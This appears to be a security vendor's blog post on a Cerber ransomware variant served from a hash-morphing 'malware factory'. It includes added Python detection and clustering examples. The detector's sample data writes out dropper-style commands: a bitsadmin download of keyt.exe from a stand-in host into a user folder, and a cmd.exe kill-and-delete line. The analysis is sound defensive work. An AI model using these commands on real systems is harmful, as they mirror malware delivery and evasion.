Ransomware authors are in a constant state of innovation. Two weeks ago, Invincea discovered a version of Cerber that could not only hold a victim’s machine hostage, but also potentially be used as part of a Distributed Denial of Service attack. Keeping up a high rate of change and innovation is important for malware authors to stay ahead of security controls, and in their latest creation, they have incorporated the ability to manufacture new payload variants on the fly using server-side malware factories. Invincea has discovered a new Cerber ransomware attack variant that uses a unique, never-before-seen trick designed to defeat signature-based solutions such as antivirus and Threat Intelligence services, and any other security solution that relies on identifying hashes of known malware for detection. In this new “hash factory” attack, the server that delivers the payload uses a server-side “malware factory” to morph the Cerber payload and generate unique hashes as often as every 15 seconds.
Let’s first take a look at the Invincea Management Server’s forensic logs of this incident to see how this variant of Cerber behaved in an enterprise environment. A larger version of the logs below can be viewed here.
Figure 1: Screenshot showing latest variant of Cerber Ransomware behavior on an endpoint in an enterprise environment
The logs begin by showing that the user opened a weaponized Office document from Outlook. In this case the document contained macros that invoked Microsoft PowerShell, which ran commands encoded in Base64. Once decoded, the command uses the Windows Background Intelligent Transfer Service (BITS) to download a binary named keyt.exe from a remote system and places it in the current user’s “My Documents” folder. Interestingly, Symantec’s heuristic detection determined that keyt.exe was likely malicious and noted that in its logs. However, the binary launched and executed despite Symantec’s efforts to thwart the attack. The keyt.exe binary renames itself to ntoskrnl.exe and sets itself to autorun at system start. Finally, the Command Shell is invoked to kill the original keyt.exe process and delete the original file from the system, and then checks that the newly infected system has networking capability by pinging itself.
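The chain described above (Office document spawning PowerShell, a Base64-encoded command, a BITS download into the user profile, a rename to a system binary name, a Run-key autorun and a cmd.exe self-cleanup) is exactly the kind of behaviour an endpoint detection rule can match without knowing any file hash. The following is an added example, not Invincea’s product logic or code from the post: a small Python matcher run over constructed telemetry records. The event fields, the `payload.example.invalid` host, the user name and the paths are all assumptions made up for the sample; the only fact it relies on is that PowerShell’s `-EncodedCommand` argument is Base64 of UTF-16LE text.

```python
import base64
import re

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
SYSTEM_NAMES = {"ntoskrnl.exe", "svchost.exe", "csrss.exe", "lsass.exe"}
USER_PROFILE = re.compile(r"c:\\users\\[^\\]+\\(?:documents|appdata)\\", re.I)
WINDOWS_DIR = re.compile(r"c:\\windows\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand / -enc, or None if absent or malformed.
    PowerShell expects Base64 of UTF-16LE text, so the decode must use that codec."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Match each telemetry record against the behaviours the post describes.
    Returns a list of (image, reason) findings; benign records produce none."""
    findings = []
    for ev in events:
        img = ev["image"].lower()
        if ev["type"] == "process":
            cmd, parent = ev["cmdline"], ev["parent"].upper()
            if img == "powershell.exe":
                if parent in OFFICE_APPS:
                    findings.append((img, "PowerShell spawned by an Office application"))
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    findings.append((img, "Base64-encoded PowerShell command"))
                    cmd = decoded  # apply the remaining rules to the decoded script
            low = cmd.lower()
            if "bitsadmin" in low and "/transfer" in low and USER_PROFILE.search(cmd):
                findings.append((img, "BITS download into a user-profile directory"))
            if img == "cmd.exe" and "taskkill" in low and re.search(r"\bdel\b", low):
                findings.append((img, "cmd.exe kills a process and deletes its image"))
        elif ev["type"] == "file_rename":
            name = ev["dst"].rsplit("\\", 1)[-1].lower()
            if name in SYSTEM_NAMES and not WINDOWS_DIR.search(ev["dst"]):
                findings.append((img, f"system binary name {name} used outside C:\\Windows"))
        elif ev["type"] == "registry_set":
            if RUN_KEY.search(ev["key"]) and USER_PROFILE.search(ev["value"]):
                findings.append((img, "Run-key autorun pointing into a user-profile directory"))
    return findings


def _enc(script):
    """Helper used only to build the constructed sample: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command line (hypothetical host and path, not from the post).
BITS_CMD = (r"bitsadmin /transfer job1 /download /priority high "
            r"http://payload.example.invalid/keyt.exe C:\Users\alice\Documents\keyt.exe")

# Constructed telemetry mirroring the chain in the post; not Invincea's logs.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "OUTLOOK.EXE", "image": "WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n invoice.doc'},
    {"type": "process", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + _enc(BITS_CMD)},
    {"type": "process", "parent": "powershell.exe", "image": "bitsadmin.exe", "cmdline": BITS_CMD},
    {"type": "file_rename", "image": "keyt.exe",
     "src": r"C:\Users\alice\Documents\keyt.exe", "dst": r"C:\Users\alice\Documents\ntoskrnl.exe"},
    {"type": "registry_set", "image": "ntoskrnl.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntoskrnl",
     "value": r"C:\Users\alice\Documents\ntoskrnl.exe"},
    {"type": "process", "parent": "ntoskrnl.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c taskkill /f /im keyt.exe & del "C:\Users\alice\Documents\keyt.exe" & ping 127.0.0.1'},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},  # benign admin use, no finding
]

if __name__ == "__main__":
    for image, reason in analyze(SAMPLE_EVENTS):
        print(f"{image:16} {reason}")
```

Each rule keys on a relationship (parent process, target directory, registry location) rather than on the payload bytes, which is why it keeps working when the server hands out a fresh hash every 15 seconds; the decoded script is fed back through the same rules so that encoding the command buys the attacker nothing.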
The good news is that, thanks to Invincea, this user was not impacted by this attack. Invincea detected the attack and restored the system to a clean state of health.
Server-Side Malware Factory
Invincea researchers see dozens of Cerber infection attempts every day. However, when we tried to duplicate the download for this variant, we noticed that the payload delivery server handed us a binary with a different hash from the one in the event above. When we downloaded it a third time, there was yet another hash. Fifteen seconds later, there was another, and then another. In all we downloaded over 40 Cerber payloads, every one with a unique hash.
It appeared we were dealing with a server-side malware factory. Malware factories and polymorphic malware are not new. A white paper from RSA on the malware factory concept, with proof of activity in the wild, can be downloaded here. This document was co-authored in 2014 by RSA’s Christopher Elisan (@tophs) and Patrick Belcher (@belchspeak), now at Invincea. It is unknown whether the payloads on the Cerber delivery server were being programmatically generated on the server itself, or were being generated remotely and uploaded by a script.
We ran these payloads through our deep learning malware detection technology that is the centerpiece of X by Invincea. The deep learning technology determined that these payloads cluster tightly together, indicating that they share the same malware DNA as shown below:
Figure 2: Cluster of key2.exe samples in X by Invincea’s deep learning malware detection showing matches to ransomware samples from 2015
Our deep learning technology showed that the keyt.exe samples we downloaded shared the same malware characteristics as each other, but more importantly, they exactly matched a sample Invincea collected back in September of 2015. That original sample was detected as a ransomware dropper delivered by the Neutrino Exploit Kit. You would think that old code from 2015 would be instantly detectable by the antivirus industry, but the new keyt.exe samples, when uploaded to VirusTotal, are detected by only 4 AV vendors. By constantly morphing the same old binary from 2015, the attackers are able to evade detection quite easily.
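The two observations above, that every download carried a new hash yet all the samples clustered together with a 2015 dropper, can be reproduced in miniature. The following is an added example and is not Invincea’s deep learning model or any code from the post: it builds a constructed “base binary” from seeded random bytes, derives morphed variants the way a factory would (a few in-place byte tweaks plus a fresh tail per build), and shows that SHA-256 separates every variant while a byte 4-gram Jaccard similarity still groups them into one family and leaves unrelated blobs apart. The blob sizes, the number of tweaks and the 0.5 threshold are assumptions chosen for the demonstration, not values from the page.

```python
import hashlib
import random


def make_family(seed=2015, size=4096, variants=5, unrelated=2):
    """Construct a base blob, `variants` morphed copies of it, and `unrelated`
    blobs that share nothing with it. Each copy keeps the base bytes but gets
    8 random byte edits and a new 64-byte tail, enough to change every hash."""
    rng = random.Random(seed)
    base = bytes(rng.randrange(256) for _ in range(size))
    family = []
    for _ in range(variants):
        body = bytearray(base)
        for _ in range(8):                                   # touch a few bytes in place
            body[rng.randrange(size)] = rng.randrange(256)
        body += bytes(rng.randrange(256) for _ in range(64))  # fresh tail per build
        family.append(bytes(body))
    others = [bytes(rng.randrange(256) for _ in range(size)) for _ in range(unrelated)]
    return family, others


def sha256(blob):
    """Exact-match identity: any single-byte change yields a different digest."""
    return hashlib.sha256(blob).hexdigest()


def ngram_set(blob, n=4):
    """Structural feature: the set of all byte n-grams in the blob."""
    return {blob[i:i + n] for i in range(len(blob) - n + 1)}


def jaccard(a, b):
    """Set overlap in [0, 1]; 1.0 means identical feature sets."""
    return len(a & b) / len(a | b)


def cluster(samples, threshold=0.5):
    """Greedy single-link clustering on n-gram Jaccard similarity.
    Returns a list of clusters, each a list of indices into `samples`."""
    feats = [ngram_set(s) for s in samples]
    clusters = []
    for i, f in enumerate(feats):
        for members in clusters:
            if any(jaccard(f, feats[j]) >= threshold for j in members):
                members.append(i)
                break
        else:
            clusters.append([i])
    return clusters


def compare(samples):
    """Summarise what hash-based and similarity-based detection each see."""
    return {
        "samples": len(samples),
        "distinct_hashes": len({sha256(s) for s in samples}),
        "clusters": cluster(samples),
    }


if __name__ == "__main__":
    family, others = make_family()
    result = compare(family + others)
    print(f"{result['samples']} samples, {result['distinct_hashes']} distinct SHA-256 values")
    print("similarity clusters:", result["clusters"])
```

A hash denylist sees seven unrelated unknowns here; the similarity view sees one family of five plus two strangers. Real detectors use richer features than raw byte n-grams, but the principle is the same: score what the binary is made of, not which exact bytes it happens to be this time.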
Our analysis also showed a relationship between keyt.exe and another interesting binary called “SS_same_israel_freegaza.exe.” As the name implies, the malware author wanted not only to infect endpoints, but also to make a political statement about Israel. This binary was collected from an incident on the same day, detailed below:
Figure 3: Cerber download renamed to exe with political statement
In the above event, the dropper file was named encrypted.exe, not keyt.exe as in the previous event. Also, there was no PowerShell command, only the bitsadmin file transfer. Once the payload was launched, it exhibited Cerber behavior on the endpoint, as it was essentially the same binary type as keyt.exe, shown clustered in our deep learning malware detection tool. Another difference is that the payload delivery server was different. In the first incident, the server’s IP was 220.127.116.11. For the encrypted.exe payload server, the IP is 18.104.22.168, on the high port 8012.
Was this new payload server also using a server-side malware factory? We tested additional downloads, but instead of getting more Cerber payloads, the encrypted.exe changed to a Dridex banking Trojan, and that binary remained static: its hash did not change with further testing.
The Dridex botnet has been farmed out to multiple threat actors delivering Dridex Banking Trojans, Cerber Ransomware, and Locky Ransomware. But it seems that in the case of the anti-Israeli payload, the Dridex delivery systems may have been sharing crimeware-as-a-service time with the Cerber Ransomware crew, or perhaps the Dridex gang hit the “send” button on their latest Dridex run just a tad too early.
The server that delivered the payload in this example used a server-side “malware factory” to morph the same Cerber payload and generate unique hashes as often as every 15 seconds. As this example shows, malware factories are purpose-built to evade detection by signature-based control systems and threat intelligence tools. Additionally, onboard Windows utilities are frequently being used to bypass other perimeter control systems to either download or assemble malware directly on the endpoints, making the attacks even stealthier.